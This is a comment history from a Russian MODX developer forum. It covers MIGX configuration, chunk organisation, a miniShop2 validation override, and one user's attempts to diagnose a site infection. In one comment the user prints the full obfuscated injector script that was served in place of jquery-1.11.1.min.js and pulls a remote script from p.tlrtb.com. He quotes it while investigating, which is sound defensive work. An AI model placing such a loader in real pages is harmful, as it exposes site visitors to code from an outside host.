Николай

Николай

С нами с 09 ноября 2013; Место в рейтинге пользователей: #57
Николай
18 сентября 2018, 17:44
0
Почему-то заметку минусуют. Может быть потому, что перешли на этот сайт и с них сняли деньги?

Скину ссылочку на сайт (не мой), где вирус ведёт себя агрессивно — ivpstore_ru. Скорее всего зайдёте только со 2-го раза :) Вот там можно попробовать описанный способ проверки.
Если что я извиняюсь конечно, но про подписки я изначально писал. А предупредить в сообщении не догадался просто… В общем, скорее всего способ проверки будет работать только для тех кто в интернет с 3G выходит. А остальные будут спать спокойно. Я только что проверил этот сайт с проводного интернета, редиректа нет.
Николай
18 сентября 2018, 17:34
0
Да, вы всё верно говорите. Но, в цепочке хозяин сайта — менеджер — подрядчик — программист (это может быть не вся цепочка), заработать лично мне если удастся что-то, то сущие копейки, и то не факт. При этом я буду заниматься тем на что не подписывался изначально, и что мне не надо в принципе… И это уже другой вопрос)
Николай
18 сентября 2018, 16:49
0
зашивают серверную часть, которая рандомно себя проявляет + параллельно проверяя USER_AGENTS или даже IP посетителя на предмет вхождения в подсеть сотовых операторов.
То то я сейчас написал парсер js фалов с разных сайтов, чтобы мониторить ситуацию, а он ничего не выдаёт, скорее всего потому, что парсер на сервере работает, оттуда запросы идут, а я то сижу на 4G. Т.е. описанный мной способ скорее всего не работает для тех у кого проводной интернет, или Wifi. Т.е. всё ещё хитрее, чем я думал. Большинство очень долго не заметит ничего…

Так же никто не исключает возможность взлома вашего сервера через Exim или какие-то другие службы с устаревшим софтом, а не через CMS.
Так в том то и дело, что сайты разных владельцев на разных серверах, и даже иностранный хостинг один есть.

В общем давно бы уже заказали аудит у профессионалов, раз сами не можете справиться с проблемой.
Буду иметь ввиду) Лично мне пока не нужно просто… Один сайт только мой, и то собирался его переделывать. А объяснить клиентам необходимость этого будет сложно. Либо скупердяи, либо могут подумать, что их пытаются развести на деньги, либо за сайты отвечают менеджеры какие-нибудь, которым нафиг не надо ничего, работает вроде и ладно. Да и вообще, инициатива часто наказуема))
Николай
18 сентября 2018, 15:00
0
Скину ссылочку на сайт (не мой), где вирус ведёт себя агрессивно — ivpstore_ru. Скорее всего зайдёте только со 2-го раза :) Вот там можно попробовать описанный способ проверки.
Николай
10 сентября 2018, 20:52
0
А лично меня полностью устраивает возможность хранить чанки и сниппеты в базе, и править всё это в админке, разбивать по категориям с несколькими уровнями вложенности. Разницу в скорости по сравнению с файлами почувствовать сложно, зато удобство очевидно. По крайней мере лично для меня) Попадались сайты, которые были сделаны на файлах. По мне так треш полный. Куча чанков и сниппетов разбиты по папкам, замотаешься искать, что куда вложено, от чего зависит. А некоторые программисты слишком ответственно подходят к этому делу. Как разобьют всё на чанки, так потом приходится 20 окон открыть, чтобы какую-нибудь небольшую штуку добавить. Отрыл шаблон — там ссылка на другой шаблон — там ссылки на чанки, в чанках на другие чанки, а там в каждом ещё по пять ссылок… И всё это в отдельных файлах, разбитых по куче папок. Думаешь, нафик эти извращения))

В связи с этим хотелось бы узнать опыт грамотных программистов. Лично я стараюсь как можно меньше плодить чанков и шаблонов. В идеале, 2-3 шаблона, и штук 5-7 чанков касающихся вёрстки. Не считая чанков разных дополнений.
Николай
08 сентября 2018, 01:07
+1
Т.е. порядок действий такой:

  • создаём конфигурацию
  • создаём вкладку
  • создаём поля во вкладке, которые надо заполнять, указываем их тип
  • создаём поля таблицы. Т.е. забили данных много, а вывести можем только одно в таблице. Поля таблицы можно обрабатывать на лету.

Вот ещё скрин:



Конечно, бывают там косячки, надо немного попрактиковаться, но это всё проще в любом случае.
Николай
08 сентября 2018, 00:59
+1
Я не ругаюсь, просто крик души от того как люди мучаются когда всё проще пареной репы)) К вам не имеет отношения, просто столько всяких обучалок по MIGX, где учат json править) Вот увидел очередной свежий пример, и в очередной раз удивился, что способ правки json всё также актуален даже для таблиц внутри таблиц))

В прошлом скрине я ошибся, конфигурация создаётся во вкладке MIGX. Вот примерно такая последовательность:



inputTV в окне с цифрой 4 чуть ниже. Там же можно задать Input TV type, если не хотим TV переменную создавать. Можно задать значение по умолчанию. Во вкладке Mediasources можно, например, источник файлов для изображений задать. А вообще там много всяких настроек и опций.
Николай
08 сентября 2018, 00:25
+1
Откуда столько извращенцев готовых json код вручную городить, когда есть менеджер MIGX, где создавать таблицы намного проще, быстрее и функциональнее) Это из разряда сайты верстать в блокноте.



Я уже столько всяких таблиц на MIGX переделал, и ни разу json для MIGX руками не правил. До сих пор удивляюсь почему везде пытаются вручную json писать, и нигде не сказано про менеджер. А там ведь есть всякие рендеры, можно сниппеты пихать, разного рода взаимодействия между полями таблиц настраивать.
Николай
06 сентября 2018, 01:20
0
По изменённому файлу jquery с той же ссылкой на tlrtb.com я выявил несколько своих сайтов заражённых, и один чужой. Но может дело не конкретно в этом файле, а в том, что это первый javascript, который в коде встречается.
Николай
06 сентября 2018, 01:07
0
Кроме как глазами прочесать несколько тысяч файлов больше пока в голову ничего не приходит)))
Николай
06 сентября 2018, 00:48
0
Да, ещё и не при каждом обновлении страницы в консоль ошибка выпадает, и не каждый раз файл jquery-1.11.1.min.js заменяется. То нормально откроется, то нет.
Николай
06 сентября 2018, 00:38
0
Когда закрыл сайт в .htaccess и оставил доступ только себе по ip, вот такое в консоли появляется:


Убираю блокировку — в консоли чисто.

Открываю файл jquery (через браузер) и вижу этот код:

!function(){function t(){try{return window.self!==window.top}catch(t){return!0}}function e(){var t=document.getElementsByTagName("head")[0],e=document.createElement("script");e.src="http://p.tlrtb.com/ad/base.js?",e.type="text/javascript",t.appendChild(e)}function n(t){o.parentNode.insertBefore(t,o.nextSibling)}function r(t){document.write(t.outerHTML)}function c(){for(var t=document.createElement("script"),e=Array.prototype.slice.call(o.attributes),n=0;n<e.length;n++)t.setAttribute(e[n].nodeName,e[n].nodeValue);return t.src="http://мойсайт.ru/assets/site/libs/jquery-1.11.1.min.js?",t}var o=document.currentScript||document.scripts[document.scripts.length-1],i=c();o.async||o.defer?n(i):r(i),window.__qsrad||t()||(window.__qsrad=1,e())}();
Этот скрипт подменяет содержимое файла 'jquery-1.11.1.min.js' на своё, но как я понимаю подтягивает и реальный jquery.

Причём на хостинге сам файл не изменён. Выкачивал все файлы сайта, искал поиском по файлам, ничего похожего на «tlrtb» не нашлось. Искал по базе — тоже. Сканнер scannerMODX запускал — чисто. Айболит — тоже чисто.

И как эта гадость появляется вместо реального содержимого jquery-1.11.1.min.js интересно…
Николай
04 августа 2018, 04:18
0
Грамотные специалисты, подскажите, вот такая команда SSH теоретически сможет выявить масштабы заражения?
find /путь/к/папке/хостинга/ -mindepth 1 \
    -newermt '2018-07-10 00:00' \
    ! -newermt '2018-08-01 00:00' \
    -ls
Т.е. с помощью SSH ищем изменённые файлы в определённом диапазоне дат. Если на сайте не производится каких-то активных действий, то в файловой системе практически ничего не меняется. И в случае заражения мы увидим новые файлы, либо увидим какие старые файлы изменились. Верно? Есть нюансы такого способа?
Николай
25 апреля 2018, 23:56
+1
Я бы вам посоветовал зайти на какой-нибудь конструктор, и попытаться сделать что-нибудь там. Например, tilda.cc — очень неплох. Вы можете набросать на нём сайт за пару часов с красивым чистым дизайном и хорошей типографикой. И даже выгрузить код потом к себе на хостинг. Получится что-то вроде этого — togdazine.ru/project/hooligany/ И не надо мучиться. А насчёт кодинга… когда-то мне тоже было интересно им заниматься. А сейчас понимаю, что просидеть кучу времени за монитором должно стоить того по деньгам. А если этим не зарабатываешь, то какой смысл забивать голову и портить себе здоровье...? Всё равно любые полученные знания вебразработки очень быстро устаревают, т.к. это чисто прикладные технологии. Это не физика, химия, или история, которые в целом постоянны. Хотя, кому что.
Николай
05 марта 2018, 16:35
0
Подскажите, а добавить Source Map к CSS при компиляции LESS, реально?
Николай
25 февраля 2018, 23:09
0
Невнимательно прочитал, у вас Office. Но там скорее всего такой же принцип.
Николай
25 февраля 2018, 23:06
0
Подключите свой класс заказа, как это сделать описано тут — docs.modx.pro/components/minishop2/development/service/order#%D0%9F%D1%80%D0%B8%D0%BC%D0%B5%D1%80

У меня такой код:

<?php   
    class myOrderHandler extends msOrderHandler {
    public function validate($key, $value) {
        switch ($key) {           
            case 'phone':
                //$value = substr(preg_replace('/[^-+0-9]/iu', '', $value), 0);
                $value = $value;
                break;              

            default:
                return parent::validate($key, $value);
        }
        if ($value === false) {
            $value = '';
        }
    
        return $value;
    }
}
И телефон не обрезается.
Николай
20 ноября 2017, 17:09
0
К сожалению, у меня самого IGNORE не работало, поэтому я сделал похожим способом как в комментарии ниже. Код через ClientConfig вводится, а потом всё это обрабатывается сниппетом, добавляющим пробелы после скобок {.
Николай
19 ноября 2017, 18:51
0
После каждой скобки "{" должен быть пробел, тогда заработает